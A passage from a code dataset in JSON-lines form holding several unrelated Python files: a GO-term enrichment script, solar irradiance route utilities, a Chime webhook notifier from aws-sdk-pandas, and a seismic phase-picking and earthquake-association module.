cluster dictionary\ncluster_result_open = open(cluster_result, 'r')\nline = cluster_result_open.readline()\nline = cluster_result_open.readline()\nexpre_gen =[]\ndict_cluster = {}\n\n#make dictionary with cluster as key and genes as items for each cluster:\nwhile line:\n info = line.strip().replace('\"','').split('\\t')\n gene = info[0]\n cluster = info[1]\n expre_gen.append(gene)\n if cluster in dict_cluster:\n dict_cluster[cluster].append(gene)\n else:\n dict_cluster[cluster] = [gene]\n line = cluster_result_open.readline()\n\nprint (dict_cluster)\n#AraCyc ### make gene and go-term dictionary\ngenler_list = []\npathway = [] #GO term list\n\ndef add_go_to_dict(go_annot, dict):\n for line in go_annot:\n info = line.strip().split(\"\\t\")\n gene = info[0] # gene ID\n #if gene.startswith(\"AT\"):\n pathway = info[1] # GO term\n x = info[2].strip().split(' ')\n function_str = \"_\".join(x)\n path_list= [pathway, function_str]\n path = \".\".join(path_list)\n if gene in expre_gen:\n if gene not in genler_list:\n genler_list.append(gene)\n #for GO in pathway:\n if path in dict:\n if gene not in dict[path]:\n dict[path].append(gene)\n else:\n dict[path] = [gene]\n \ndict = {} #dictionary should be GOterm:genes \nadd_go_to_dict(go_annot, dict)\nprint (dict)\n\n## make table for enrichment comparing clusters and GO terms, how many clusters represent 'x' GO term?\noutput_table = open('tableforEnrichment_%s' % cluster_result, 'w') # output is GOterm_cluster#, inclust-inGO, inclust-notGO, notclust-inGO, notclust-notGO\ngenenum= len(genler_list) #to compare just genes in your genelist (not all genes), use this genenumber\nfor item in dict:\n #item:GO-ID\n gene_list_for_go = dict[item]\n #print gene_list_for_go\n for i in dict_cluster.keys():\n cluster_list = dict_cluster[i]\n \n count1 = 0\n count2 = 0\n count3 = 0\n count4 = 0\n for j in cluster_list:\n if j in gene_list_for_go:\n count1 = count1 + 1\n else:\n count2 = count2 + 1\n count3 = len(gene_list_for_go) - count1\n count4 = genenum - (count1 + count2 + count3) #number is based on the # of genes from cluster file- in this case 20998\n output_table.write('%s|%s\\t%i\\t%i\\t%i\\t%i\\n' % (item, i, count1, count2, count3, count4))\noutput_table.close()\n#print gene_list_for_go","repo_name":"ShiuLab/GO-term-enrichment","sub_path":"cluster_enrichment_final_Sl.py","file_name":"cluster_enrichment_final_Sl.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"20777869951","text":"import pyproj\n\nimport pandas as pd\n\nfrom pvgrip.ssdp.utils \\\n import timestr2utc_time\n\nfrom pvgrip.utils.epsg \\\n import ll2epsg\n\n\ndef write_locations(route, ghi_default, dhi_default, time_default,\n azimuth_default, zenith_default, offset_default,\n locations_fn, epsg):\n with open(locations_fn, 'w') as f:\n for x in route:\n if 'longitude' not in x or 'latitude' not in x:\n raise RuntimeError\\\n (\"longitude or latitude is missing!\")\n\n lat_met, lon_met = \\\n ll2epsg(lat = x['latitude'], lon = x['longitude'], epsg = epsg)\n\n if 'dhi' not in x:\n x['dhi'] = dhi_default\n\n if 'ghi' not in x:\n x['ghi'] = ghi_default\n\n if 'azimuth' not in x:\n x['azimuth'] = azimuth_default\n\n if 'zenith' not in x:\n x['zenith'] = zenith_default\n\n if 'offset' not in x:\n x['offset'] = offset_default\n\n if 'timestr' not in x:\n x['utc_time'] = timestr2utc_time(time_default)\n else:\n x['utc_time'] = timestr2utc_time(x['timestr'])\n\n fmt = '\\t'.join(('%.12f',)*7 + ('%d\\n',))\n\n f.write(fmt %(lat_met, lon_met,\n x['ghi'],x['dhi'],\n x['azimuth'],x['zenith'],x['offset'],\n x['utc_time']))\n\n return route\n\n\ndef write_result(route, ssdp_ofn, ofn):\n df_a = pd.DataFrame(route)\n df_b = pd.read_csv(ssdp_ofn, header=None)\n df_b.columns = ['POA']\n df_c = pd.concat([df_a.reset_index(drop=True), df_b], axis=1)\n return df_c.to_csv(ofn, sep='\\t', index=False)\n","repo_name":"esovetkin/pvgrip","sub_path":"pvgrip/route/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"29933400617","text":"\ndef possible_path(lst):\n ok = True\n dict = {\"1\":[2],\"2\":[1,\"H\"],\"3\":[4],\"4\":[3,\"H\"],\"H\":[2,4]}\n for i in range(len(lst)-1):\n possiblePath = dict[str(lst[i])]\n if lst[i+1] not in possiblePath:\n ok = False\n return ok\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"FLgJEC8SK2AJYLC6y_21.py","file_name":"FLgJEC8SK2AJYLC6y_21.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35801528115","text":"\"\"\"Chime Message/Notification module.\"\"\"\n\n\nimport json\nimport logging\nfrom typing import Any, Optional\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\n\n_logger: logging.Logger = logging.getLogger(__name__)\n\n\ndef post_message(webhook: str, message: str) -> Optional[Any]:\n \"\"\"Send message on an existing Chime Chat rooms.\n\n Parameters\n ----------\n :param webhook : webhook\n Webhook: This contains all the authentication information to send the message\n :param message : message\n The actual message which needs to be posted on Slack channel\n\n Returns\n -------\n dict\n Represents the response from Chime\n \"\"\"\n response = None\n chime_message = {\"Content\": f\"Message: {message}\"}\n req = Request(webhook, json.dumps(chime_message).encode(\"utf-8\"))\n try:\n response = urlopen(req) # pylint: disable=R1732\n _logger.info(\"Message posted on Chime. Got respone as %s\", response.read())\n except HTTPError as e:\n _logger.exception(\"Request failed: %d %s\", e.code, e.reason)\n except URLError as e:\n _logger.exception(\"Server connection failed: %s\", e.reason)\n return response\n","repo_name":"aws/aws-sdk-pandas","sub_path":"awswrangler/chime.py","file_name":"chime.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3653,"dataset":"github-code","pt":"32"} +{"seq_id":"27329023407","text":"import obspy\r\nfrom obspy import imaging\r\nimport numpy as np\r\nimport os\r\nfrom glob import glob\r\nimport matplotlib.pyplot as plt\r\nfrom multiprocessing import Process, Manager\r\nfrom time import ctime\r\nimport math\r\nfrom numba import jit\r\nfrom ..mathTool.mathFunc_bak import getDetec, prob2color\r\nfrom ..io import tool\r\nfrom ..io.seism import getTrace3ByFileName,Quake,QuakeL,Record,QuakeCC,RecordCC,t0,t1\r\nfrom ..io.sacTool import staTimeMat\r\n\r\nfrom ..mapTool.mapTool import plotTopo,faultL\r\nimport mpl_toolkits.basemap as basemap\r\nimport torch\r\nfrom obspy import taup\r\ntaupModel=taup.TauPyModel(model='iasp91')\r\nmaxA=2e19\r\nos.environ[\"MKL_NUM_THREADS\"] = \"32\"\r\n@jit\r\ndef isZeros(a):\r\n new = a.reshape([-1,10,a.shape[-1]])\r\n if (new.std(axis=(1))==0).sum()>5:\r\n return True\r\n return False\r\n\r\n\r\n'''\r\n@jit\r\ndef predictLongData(model, x, N=2000, indexL=range(750, 1250)):\r\n if len(x) == 0:\r\n return np.zeros(0)\r\n N = x.shape[0]\r\n Y = np.zeros(N)\r\n perN = len(indexL)\r\n loopN = int(math.ceil(N/perN))\r\n perLoop = int(1000)\r\n inMat = np.zeros((perLoop, 2000, 1, 3))\r\n #print(len(x))\r\n zeroCount=0\r\n for loop0 in range(0, int(loopN), int(perLoop)):\r\n loop1 = min(loop0+perLoop, loopN)\r\n for loop in range(loop0, loop1):\r\n i = loop*perN\r\n sIndex = min(max(0, i), N-2000)\r\n if sIndex > 0:\r\n inMat[loop-loop0, :, :, :] = processX(x[sIndex: sIndex+2000, :])\\\r\n .reshape([2000, 1, 3])\r\n outMat = (model.predict(inMat)[:,:,:,:1]).reshape([-1, 2000])\r\n for loop in range(loop0, loop1):\r\n i = loop*perN\r\n if isZeros(inMat[loop-loop0, :, :, :]):\r\n zeroCount+=1\r\n continue\r\n sIndex = min(max(0, i), N-2000)\r\n if sIndex > 0:\r\n Y[indexL0[0]+sIndex: indexL0[-1]+1+sIndex] = \\\r\n np.append(Y[indexL0[0]+sIndex: indexL0[-1]+1+sIndex],\\\r\n outMat[loop-loop0, indexL0].reshape([-1])\\\r\n ).reshape([2,-1]).max(axis=0)\r\n if zeroCount>0:\r\n print('zeros: %d'%zeroCount)\r\n \r\n return Y\r\n'''\r\nindexL0=range(275, 1500)\r\n@jit\r\ndef predictLongData(model, x, N=2000, indexL=range(750, 1250),dIndex=2000,dec=1):\r\n L = x.shape[0]\r\n if L <=dIndex*3:\r\n return np.zeros(L)\r\n validD = len(indexL)\r\n loop = math.ceil(dIndex/validD)\r\n zerosCount=0\r\n out = np.zeros([loop,L],np.float32)\r\n for i in range(loop):\r\n i0=validD*i\r\n i1=int((L-i0)/dIndex)*dIndex+i0\r\n X = x[i0:i1].reshape([-1,dIndex,1,3])\r\n XSTD = X.reshape([X.shape[0],-1,10,3]).std(axis=2,keepdims=True)\r\n sum0 = (XSTD==0).sum(axis=(1,2,3))\r\n X/=X.std(axis=(1,2,3),keepdims=True)+np.finfo(x.dtype).eps\r\n Y = model.predict(X)\r\n zerosCount+=(sum0>5).sum()\r\n Y[sum0>5]*=0\r\n Y[:, :indexL0[ 0] ]*=0\r\n Y[:, indexL0[-1]:]*=0\r\n out[i,i0:i1]=Y.reshape([-1])\r\n if zerosCount>0:\r\n print('zeros: %d'%zerosCount) \r\n return out.max(axis=0) \r\n'''\r\n@jit\r\ndef processX(X, rmean=True, normlize=True, reshape=True):\r\n if reshape:\r\n X = X.reshape(-1, 2000, 1, 3)\r\n if rmean:\r\n X = X - X.mean(axis=(1, 2)).reshape([-1, 1, 1, 3])\r\n if normlize:\r\n X = X/(X.std(axis=(1, 2, 3)).reshape([-1, 1, 1, 1]))\r\n return X\r\n'''\r\n@jit\r\ndef processX(X, rmean=True, normlize=False, reshape=True,isNoise=False,num=2000):\r\n if reshape:\r\n X = X.reshape(-1, num, 1, 3)\r\n #print(X.shape)\r\n if rmean:\r\n X-= X.mean(axis=1,keepdims=True)\r\n if normlize:\r\n X /=(X.std(axis=(1, 2, 3),keepdims=True))\r\n if isNoise:\r\n X+=(np.random.rand(X.shape[0],num,1,3)-0.5)*np.random.rand(X.shape[0],1,1,3)*X.max(axis=(1,2,3),keepdims=True)*0.15*(np.random.rand(X.shape[0],1,1,1)<0.1)\r\n return X\r\n\r\n\r\n\r\ndef originFileName(net, station, comp, YmdHMSJ, dirL=['data/']):\r\n #dir='tmpSacFile/'\r\n sacFileNames = list()\r\n Y = YmdHMSJ\r\n for dir in dirL:\r\n sacFileNamesStr = dir+net+'.'+station+'.'+Y['Y']+Y['j']+\\\r\n '*'+comp\r\n for file in glob(sacFileNamesStr):\r\n sacFileNames.append(file)\r\n return sacFileNames\r\n\r\nclass sta(object):\r\n def __init__(self, station, day,freq=[-1, -1], \\\r\n taupM=tool.quickTaupModel(),delta0=0.02,\\\r\n R=[-91,91,-181,181]):\r\n self.net = station['net']\r\n self.loc = station.loc()\r\n self.station = station['sta']\r\n self.sta = station\r\n self.day = day\r\n self.taupM=taupM\r\n if self.loc[0]R[1] \\\r\n or self.loc[1]R[3]:\r\n self.data=getTrace3ByFileName([[],[],[]], freq=freq,delta0=delta0,\\\r\n maxA=maxA,isData=False)\r\n print('skip')\r\n else:\r\n self.data = getTrace3ByFileName(station.getFileNames(self.day),\\\r\n freq=freq,delta0=delta0,\\\r\n maxA=maxA,isData=False)\r\n print(self.station,self.data.bTime,self.data.eTime)\r\n def __del__(self):\r\n try:\r\n del(self.data)\r\n torch.cuda.empty_cache()\r\n except:\r\n pass\r\n else:\r\n pass\r\n def predict(self,modelL=None, staTimeM=None,\\\r\n mode='mid', isClearData=False,maxD=80,decPre=1,maxDTime=2):\r\n self.timeL = list()\r\n self.vL = list()\r\n self.mode = mode\r\n indexLL = [range(275, 1700), range(275, 1700)]\r\n if mode=='norm':\r\n minValueL=[0.5,0.5]\r\n if mode=='high':\r\n minValueL=[0.4, 0.4]\r\n if mode=='mid':\r\n minValueL=[0.25, 0.25]\r\n if mode=='low':\r\n minValueL=[0.2, 0.2]\r\n if mode=='higher':\r\n minValueL=[0.6, 0.6]\r\n minDeltaL=[500, 750]\r\n for i in range(len(modelL)):\r\n y = predictLongData(modelL[i], self.data.Data(),\\\r\n indexL=indexLL[i],dec=decPre)\r\n #print(y.max(),y.std(),len(y))\r\n tmpL = getDetec(y, minValue=minValueL[i], minDelta =\\\r\n minDeltaL[i])\r\n print(ctime(),'find',len(tmpL[0]))\r\n self.timeL.append(tmpL[0])\r\n self.vL.append(tmpL[1])\r\n self.pairD = self.getPSPair(maxD=maxD)\r\n self.isPick = np.zeros(len(self.pairD))\r\n self.orignM = self.convertPS2orignM(staTimeM,maxD=maxD,maxDTime=maxDTime)\r\n if isClearData:\r\n self.clearData()\r\n\r\n def __repr__(self):\r\n reprStr=self.net + ' '+self.station+\\\r\n str(self.loc)\r\n return 'detec in station '+ reprStr\r\n\r\n\r\n def getSacFileNamesL(self, station):\r\n return station.getFileNames(self.day)\r\n\r\n def clearData(self):\r\n self.data.data = np.zeros((0, 3))\r\n\r\n def plotData(self):\r\n colorStr = ['.r', '.g']\r\n plt.plot(self.data.data[:,2]/self.data.data[:,2].max()\\\r\n + np.array(0))\r\n for i in range(len(self.timeL)):\r\n plt.plot(self.timeL[i],self.vL[i], colorStr[i])\r\n plt.show()\r\n\r\n def calOrign(self, pTime, sTime):\r\n return self.taupM.get_orign_times(pTime, sTime, self.data.delta)\r\n\r\n def getPSPair(self, maxD=80):\r\n pairD = list()\r\n if len(self.timeL) == 0:\r\n return pairD\r\n if self.data.delta<=0:\r\n return pairD\r\n maxN = maxD/self.data.delta\r\n pN=len(self.timeL[0])\r\n sN=len(self.timeL[1])\r\n j0=0\r\n for i in range(pN):\r\n pTime = self.timeL[0][i]\r\n if i < pN-1 and self.mode != 'low':\r\n pTimeNext = self.timeL[0][i+1]\r\n else:\r\n pTimeNext= self.timeL[0][i]+maxN\r\n pTimeNext = min(pTime+maxN, pTimeNext)\r\n isS = 0\r\n for j in range(j0, sN):\r\n if isS==0:\r\n j0=j\r\n if self.timeL[1][j] > pTime and self.timeL[1][j] < pTimeNext:\r\n sTime=self.timeL[1][j]\r\n #print(pTime, sTime)\r\n pairD.append([pTime*self.data.delta, sTime*self.data.delta\\\r\n , self.calOrign(pTime, sTime)*self.data.delta, \\\r\n (sTime-pTime)*self.data.delta, i, j])\r\n isS=1\r\n if self.timeL[1][j] >= pTimeNext:\r\n break\r\n return pairD\r\n\r\n def convertPS2orignM(self, staTimeM, maxDTime=2,maxD=100):\r\n laN = staTimeM.minTimeD.shape[0]\r\n loN = staTimeM.minTimeD.shape[1]\r\n orignM = [[list() for j in range(loN)] for i in range(laN)]\r\n if len(self.pairD)==0:\r\n return orignM\r\n bSec = self.data.bTime.timestamp\r\n timeL = np.zeros(len(self.pairD))\r\n for i in range(len(self.pairD)):\r\n timeL[i] = self.pairD[i][2]+bSec\r\n sortL = np.argsort(timeL)\r\n for laIndex in range(laN):\r\n for loIndex in range(loN):\r\n minPairTime=staTimeM.minTimeD[laIndex][loIndex] - maxDTime\r\n if minPairTime>maxD:\r\n continue\r\n maxPairTime=staTimeM.maxTimeD[laIndex][loIndex] + maxDTime\r\n for i in sortL:\r\n if self.pairD[i][3] >= minPairTime \\\r\n and self.pairD[i][3] <= maxPairTime:\r\n pTime = self.pairD[i][0]+bSec\r\n sTime = self.pairD[i][1]+bSec\r\n timeTmp = [pTime, sTime, timeL[i], i]\r\n orignM[laIndex][loIndex].append(timeTmp)\r\n return orignM\r\n def filt(self,f=[-1,-1],filtOrder=2):\r\n self.data.filt(f,filtOrder)\r\n return self\r\n def resample(self,resampleN):\r\n self.data.resample(resampleN)\r\n return self\r\n def pickQuake(self,quake,modelL,bSec=-10,eSec=10,bCount=-3000,eCount=3000):\r\n deg = quake.dist(self.sta)/111.19\r\n dep = self.sta['dep']/1000+quake['dep']\r\n timeL=[0,0]\r\n proL=[-1,-1]\r\n pTime0= self.getEarliest(taupModel.get_travel_times(dep, deg, \\\r\n ['p', 'P', 'PP', 'pP','Pn']))+quake['time']\r\n sTime0= self.getEarliest(taupModel.get_travel_times(dep, deg, \\\r\n ['s', 'S', 'SS', 'sS','Sn']))+quake['time']\r\n time0L = [pTime0,sTime0]\r\n for i in range(2):\r\n time0= time0L[i]\r\n bTime=time0+bCount*self.data.Delta()\r\n eTime=time0+eCount*self.data.Delta()\r\n bIndex=int((time0+bSec-bTime)/self.data.Delta())\r\n eIndex=int((time0+eSec-bTime)/self.data.Delta())\r\n if self.data.bTimeeTime:\r\n data = self.data.Data(bTime=bTime,eTime=eTime)\r\n if len(data)>4000:\r\n y = predictLongData(modelL[i], data,indexL =range(275, 775))\r\n yMax = y[bIndex:eIndex].max()\r\n proL[i]=yMax\r\n if yMax>=0.5:\r\n timeL[i]=(y[bIndex:eIndex].argmax()+bIndex)*self.data.Delta()+bTime\r\n return timeL+proL\r\n\r\n def getEarliest(self,arrivals):\r\n time=10000000\r\n if len(arrivals)==0:\r\n print('no phase')\r\n return 0\r\n for arrival in arrivals:\r\n time = min(time, arrival.time)\r\n return time\r\ndef argMax2D(M):\r\n maxValue = np.max(M)\r\n maxIndex = np.where(M==maxValue)\r\n return maxIndex[0][0], maxIndex[1][0]\r\n\r\ndef associateSta(staL, aMat, staTimeML, timeR=30, minSta=3, maxDTime=3, N=1, \\\r\n isClearData=False, locator=None, maxD=80,**kwargs):\r\n timeN = int(timeR)*2\r\n startTime = obspy.UTCDateTime(2100, 1, 1)\r\n endTime = obspy.UTCDateTime(1970, 1, 1)\r\n staN = len(staL)\r\n for staIndex in range(staN):\r\n if isClearData:\r\n staL[staIndex].clearData()\r\n staL[staIndex].isPick = staL[staIndex].isPick*0\r\n for staTmp in staL:\r\n if staTmp.data.bTime<=t0+10:\r\n continue\r\n startTime = min(startTime, staTmp.data.bTime)\r\n endTime = max(endTime, staTmp.data.eTime)\r\n startSec = int(startTime.timestamp-3600)\r\n endSec = int(endTime.timestamp+3600)\r\n if N==1:\r\n quakeL=QuakeL()\r\n __associateSta(quakeL, staL, \\\r\n aMat, staTimeML, startSec, \\\r\n endSec, timeR=timeR, minSta=minSta,\\\r\n maxDTime=maxDTime,locator=locator,maxD=maxD,**kwargs)\r\n return quakeL\r\n for i in range(len(staL)):\r\n staL[i].clearData()\r\n manager=Manager()\r\n quakeLL=[manager.list() for i in range(N)]\r\n perN = int(int((endSec-startSec)/N+1)/timeN+1)*timeN\r\n processes=[]\r\n for i in range(N):\r\n process=Process(target=__associateSta, args=(quakeLL[i], \\\r\n staL, aMat, staTimeML, startSec+i*perN, \\\r\n startSec+(i+1)*perN+1))\r\n #process.setDaemon(True)\r\n process.start()\r\n processes.append(process)\r\n\r\n for process in processes:\r\n print(process)\r\n process.join()\r\n\r\n for quakeLTmp in quakeLL:\r\n for quakeTmp in quakeLTmp:\r\n quakeL.append(quakeTmp)\r\n return quakeL\r\n \r\n\r\ndef __associateSta(quakeL, staL, aMat, staTimeML, startSec, endSec, \\\r\n timeR=30, minSta=3, maxDTime=3, locator=None,maxD=80,maxDA=-1,\\\r\n taupM=tool.quickTaupModel(),halfMaxDTime=0,loopN=2):\r\n typeO = np.int16#in maxD determined Range, if the max station cound is small than 125,use np.int8 else\r\n #,Using np.int16\r\n print('start', startSec, endSec)\r\n if maxDA<0:\r\n maxDA = maxD\r\n laN = aMat.laN\r\n loN = aMat.loN\r\n staN = len(staL)\r\n timeN = int(timeR)*90\r\n stackM = np.zeros((timeN*3, laN, loN),typeO)\r\n tmpStackM=np.zeros((timeN*3+3*maxDTime, laN, loN),typeO)\r\n stackL = np.zeros(timeN*3)\r\n quakeCount=0\r\n dTimeL =np.arange(-maxDTime, maxDTime+1)\r\n dTimeLA =np.arange(-maxDTime, maxDTime+1)*0+2\r\n if halfMaxDTime>0:\r\n dTimeL =np.arange(-maxDTime-halfMaxDTime, maxDTime+1+halfMaxDTime)\r\n dTimeLA = dTimeL*0+2\r\n dTimeLA[:halfMaxDTime]=1\r\n dTimeLA[-halfMaxDTime:]=1\r\n for loop in range(loopN):\r\n staOrignMIndex = np.zeros((staN, laN, loN), dtype=int)\r\n count=0\r\n for sec0 in range(startSec-3*timeN, endSec+3*timeN, timeN):\r\n count=count+1\r\n if count%5==0:\r\n print(ctime(),'process:',(sec0-startSec)/(endSec-startSec)*100,' find:',len(quakeL))\r\n stackM[0:2*timeN, :, :] = stackM[timeN:, :, :]\r\n stackM[2*timeN:, :, :] = stackM[0:timeN, :, :]*0\r\n tmpStackM=tmpStackM*0\r\n st=sec0+2*timeN - maxDTime\r\n et=sec0+3*timeN + maxDTime\r\n for staIndex in range(staN):\r\n tmpStackM=tmpStackM*0\r\n for laIndex in range(laN):\r\n for loIndex in range(loN):\r\n if staTimeML[staIndex].minTimeD[laIndex,loIndex] > maxDA:\r\n continue\r\n if len(staL[staIndex].orignM[laIndex][loIndex])>0:\r\n index0=staOrignMIndex[staIndex, laIndex, loIndex]\r\n for index in range(index0, len(staL[staIndex].orignM[laIndex][loIndex])):\r\n timeT = staL[staIndex].orignM[laIndex][loIndex][index][2]\r\n pairIndex = staL[staIndex].orignM[laIndex][loIndex][index][3]\r\n if timeT >et:\r\n staOrignMIndex[staIndex, laIndex, loIndex] = index\r\n break\r\n if timeT > st and staL[staIndex].isPick[pairIndex]==0:\r\n pIndex = staL[staIndex].pairD[pairIndex][4]\r\n sIndex = staL[staIndex].pairD[pairIndex][5]\r\n pTime = staL[staIndex].timeL[0][pIndex]\r\n sTime = staL[staIndex].timeL[1][sIndex]\r\n staOrignMIndex[staIndex, laIndex, loIndex] = index\r\n if pTime * sTime ==0:\r\n continue\r\n tmpStackM[round(timeT-sec0)+dTimeL, laIndex, loIndex]=\\\r\n np.max([tmpStackM[round(timeT-sec0)+dTimeL, laIndex, loIndex],dTimeLA],axis=0)\r\n '''\r\n for dt in range(-maxDTime, maxDTime+1):\r\n tmpStackM[int(timeT-sec0+dt), laIndex, loIndex]=1\r\n '''\r\n stackM[2*timeN: 3*timeN, :, :] += tmpStackM[2*timeN: 3*timeN, :, :]\r\n stackL = stackM.max(axis=(1,2))\r\n peakL, peakN = tool.getDetec(stackL, minValue=minSta*dTimeLA.max(), minDelta=timeR)\r\n for peak in peakL:\r\n if peak > timeN and peak <= 2*timeN:\r\n time = peak + sec0\r\n laIndex, loIndex = argMax2D(stackM[peak, :, :].reshape((laN, loN)))\r\n quakeCount+=1\r\n quake = Quake(la=aMat[laIndex][loIndex].midLa,lo=aMat[laIndex][loIndex].midLo,\\\r\n dep=10.0,\\\r\n time=time, randID=quakeCount)\r\n for staIndex in range(staN):\r\n isfind=0\r\n if staTimeML[staIndex].minTimeD[laIndex,loIndex] > maxD:\r\n continue\r\n if len(staL[staIndex].orignM[laIndex][loIndex]) != 0:\r\n for index in range(staOrignMIndex[staIndex, laIndex, loIndex], -1, -1):\r\n if int(abs(staL[staIndex].orignM[laIndex][loIndex][index][2]-time))<=maxDTime:\r\n if staL[staIndex].isPick[staL[staIndex].\\\r\n orignM[laIndex][loIndex][index][3]]==0:\r\n pairDIndex = staL[staIndex].orignM[laIndex][loIndex][index][3]\r\n pIndex = staL[staIndex].pairD[pairDIndex][4]\r\n sIndex = staL[staIndex].pairD[pairDIndex][5]\r\n if staL[staIndex].timeL[0][pIndex] > 0 and \\\r\n staL[staIndex].timeL[1][sIndex] > 0:\r\n quake.Append(Record(staIndex=staIndex, \\\r\n pTime=staL[staIndex].orignM[laIndex][loIndex][index][0], \\\r\n sTime=staL[staIndex].orignM[laIndex][loIndex][index][1],\\\r\n pProb=staL[staIndex].vL[0][pIndex],\\\r\n sProb=staL[staIndex].vL[1][sIndex]))\r\n isfind=1\r\n staL[staIndex].timeL[0][pIndex] = 0\r\n staL[staIndex].timeL[1][sIndex] = 0\r\n staL[staIndex].isPick[pairDIndex] = 1\r\n break\r\n if staL[staIndex].orignM[laIndex][loIndex][index][2] < time - maxDTime:\r\n break\r\n if isfind==0:\r\n pTime=0\r\n sTime=0\r\n pProb=-1\r\n sProb=-1\r\n pTimeL=staL[staIndex].timeL[0]*staL[staIndex].data.delta\\\r\n +staL[staIndex].data.bTime.timestamp\r\n sTimeL=staL[staIndex].timeL[1]*staL[staIndex].data.delta\\\r\n +staL[staIndex].data.bTime.timestamp\r\n pTimeMin=time+staTimeML[staIndex].minTimeP[laIndex,loIndex]-maxDTime\r\n pTimeMax=time+staTimeML[staIndex].maxTimeP[laIndex,loIndex]+maxDTime\r\n sTimeMin=time+staTimeML[staIndex].minTimeS[laIndex,loIndex]-maxDTime\r\n sTimeMax=time+staTimeML[staIndex].maxTimeS[laIndex,loIndex]+maxDTime\r\n validP=np.where((pTimeL/1e5-pTimeMin/1e5)*(pTimeL/1e5-pTimeMax/1e5)<=0)\r\n if len(validP)>0:\r\n if len(validP[0])>0:\r\n if pTimeL[validP[0]][0]<=(time+maxD/0.7+maxDTime):\r\n pTime=pTimeL[validP[0]][0]\r\n pIndex=validP[0][0]\r\n pProb = staL[staIndex].vL[0][pIndex]\r\n if pTime < 1:\r\n continue\r\n validS=np.where((sTimeL-sTimeMin)*(sTimeL-sTimeMax) < 0)\r\n if len(validS)>0:\r\n if len(validS[0])>0:\r\n if sTimeL[validS[0]][0]<=(time+maxD*1.7/0.7+maxDTime):\r\n sTime=sTimeL[validS[0]][0]\r\n sIndex=validS[0][0]\r\n sProb = staL[staIndex].vL[1][sIndex]\r\n if pTime >1 and sTime>1:\r\n if np.abs(taupM.get_orign_times(pTime,sTime)-time)>=maxDTime:\r\n continue\r\n if pTime > 1:\r\n staL[staIndex].timeL[0][pIndex]=0\r\n if sTime >1:\r\n staL[staIndex].timeL[1][sIndex]=0\r\n quake.Append(Record(staIndex=staIndex, pTime=pTime, sTime=sTime, pProb=pProb, sProb=sProb))\r\n if locator != None and len(quake)>=3:\r\n try:\r\n quake,res=locator.locate(quake,isDel=True,maxErr=4)\r\n print(quake['time'],quake.loc(),res)\r\n except:\r\n print('wrong in locate')\r\n else:\r\n if res > 10:\r\n continue\r\n quakeL.append(quake)\r\n return quakeL\r\n\r\ndef getStaTimeL(staInfos, aMat,taupM=tool.quickTaupModel(),**kwarg):\r\n #manager=Manager()\r\n #staTimeML=manager.list()\r\n staTimeML=list()\r\n count =0\r\n for staInfo in staInfos:\r\n print(count,staInfo)\r\n loc=staInfo.loc()[:2]\r\n staTimeML.append(staTimeMat(loc, aMat, taupM=taupM,**kwarg))\r\n count+=1\r\n return staTimeML\r\n\r\ndef getSta(staL,i, staInfo, date, modelL, staTimeM, loc, \\\r\n freq,getFileName,taupM, mode,isPre=True,R=[-90,90,\\\r\n -180,180],comp=['BHE','BHN','BHZ'],maxD=80,delta0=0.02,\\\r\n bTime=None,eTime=None):\r\n staL[i] = sta(staInfo, date, modelL, staTimeM, loc, \\\r\n freq=freq, getFileName=getFileName, taupM=taupM, \\\r\n mode=mode,isPre=isPre,R=R,comp=comp,maxD=maxD,\\\r\n delta0=delta0,bTime=bTime,eTime=eTime)\r\ndef preSta(staL,i, staInfo, date, modelL, staTimeM, loc, \\\r\n freq,getFileName,taupM, mode,isPre=True,R=[-90,90,\\\r\n -180,180],comp=['BHE','BHN','BHZ'],maxD=80,delta0=0.02,\\\r\n bTime=None,eTime=None):\r\n staL[i].predict(staInfo, date, modelL, staTimeM, loc, \\\r\n freq=freq, getFileName=getFileName, taupM=taupM, \\\r\n mode=mode,isPre=isPre,R=R,comp=comp,maxD=maxD,\\\r\n delta0=delta0,bTime=bTime,eTime=eTime)\r\n\r\n\r\n'''\r\nself, station, day,freq=[-1, -1], \\\r\n taupM=tool.quickTaupModel(),delta0=0.02,\\\r\n R=[-91,91,-181,181],bTime=None,eTime=None\r\nself,modelL=None, staTimeM=None,\\\r\n mode='mid', isClearData=False,maxD=80\r\n '''\r\ndef getStaL(staInfos, staTimeML=[], modelL=[],\\\r\n date=obspy.UTCDateTime(0),taupM=tool.quickTaupModel(),\\\r\n mode='mid',isPre=True,f=[2, 15],R=[-90,90,\\\r\n -380,380],maxD=80,f_new=[-1,-1],delta0=0.02,resampleN=-1,\\\r\n isClearData=False,decPre=1,maxDTime=2):\r\n staL=[None for i in range(len(staInfos))]\r\n threads = list()\r\n for i in range(len(staInfos)): \r\n print(ctime(),'process on sta: ',i,date,staInfos[i])\r\n staL[i]=sta(staInfos[i], date,\r\n f, taupM,R=R,delta0=delta0)\r\n staL[i].filt(f_new)\r\n staL[i].resample(resampleN)\r\n #print(ctime(),'processed on sta: ',staL[i].data)\r\n if not isPre:\r\n return staL\r\n for i in range(len(staInfos)):\r\n if len(staTimeML)>0:\r\n staTimeM=staTimeML[i]\r\n else:\r\n staTimeM=None\r\n print(ctime(),'predict on sta: ',i,date)\r\n staL[i].predict(modelL, staTimeM, mode,\\\r\n maxD=maxD,maxDTime=maxDTime,isClearData=isClearData,decPre=decPre)\r\n return staL\r\ndef getForQuake(staL,quakes,modelL,**kwargs):\r\n for quake in quakes:\r\n for count in range(len(staL)):\r\n sta = staL[count]\r\n if len(sta.data)==3:\r\n pTime,sTime,pProb,sProb = sta.pickQuake(quake,modelL,**kwargs)\r\n if pTime > 0 :\r\n quake.records.append(Record(staIndex=count,pTime=pTime,sTime=sTime,pProb=pProb,sProb=sProb))\r\n print(quake['time'],count,pTime,sTime,pProb,sProb)\r\n\r\n\r\ndef getStaQuick(staInfos,date,f,taupM,R,delta0,f_new,resampleN):\r\n for i in range(len(staInfos)): \r\n print(ctime(),'process on sta: ',date,i)\r\n sta=sta(staInfos[i], date,\r\n f, taupM,R=R,delta0=delta0)\r\n sta.filt(f_new)\r\n 